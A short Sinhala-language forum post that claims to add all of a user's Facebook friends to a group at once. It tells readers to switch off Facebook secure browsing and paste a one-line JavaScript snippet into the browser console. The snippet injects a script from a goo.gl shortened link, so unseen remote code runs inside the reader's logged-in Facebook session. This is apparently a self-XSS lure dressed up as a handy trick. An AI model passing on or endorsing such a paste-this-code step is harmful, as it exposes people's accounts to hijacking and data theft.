Facebook Group එකකට සියලුම මිතුරන් එකවර එකතු කිරීම.
(මේම ක්‍රමය 100 % තාමත් සාර්තකයි.
)තිබුණු දෝෂයන් නිවැරදි කර නැවත සකසා තිබෙනවා !
ඔබ දන්නවා facebook group එකකට සාමාජිකයන් එකතු කල යුතු නම් එකින් එක නම් ඇතුලත් කරමින් මිතුරන් එකතු කල යුතුය. මේ එම කාර්යය වෙහෙසකින් තොරව වඩාත් ඉක්මනින් හා පහසුවෙන් කරගත හැකි එකම ක්‍රමයයි.
1. පහත ඉරි අතර ඇති සම්පුර්ණ code එකම copy කරගන්න.
__________________________________________________ __________________________
document.body.appendChild(document.createElement(' script')).src='
http://goo.gl/7Q26z';
__________________________________________________ __________________________
2. Account setting > Security > Secure browsing off කරන්න.
3. මිතුරන් එකතු කල යුතු group එකට යන්න.
4. Firefox නම් Ctrl + Shift + K එකවර ඇතුලත් කර
Chrome නම් F12 ඇතුලත් කර අවසානයට ඇති "Console" තෝරන්න
5. කලින් copy කරගත් code එක එතන ඇති code ඇතුලත් කල හැකි ස්ථානයේ paste කර Enter key ඇතුලත් කරන්න.
6. ඔබගේ browser එකේ එම tab එක තුල මෙය run වීමට ඉඩ හැර වෙනත් tab එකක ඔබගේ වැඩ කරගෙන යන්න. සියලු දෙනා එකතු වී අවසන් වන තුරු එම tab එක close කරගන්න එපා.
Firefox බාවිතා කරන්න ඒකෙන් නියමෙට මේක 110% සාර්තකයි..
ඔන්න එහෙනම් Bump and rep + ඕනේ මචන් ලා...
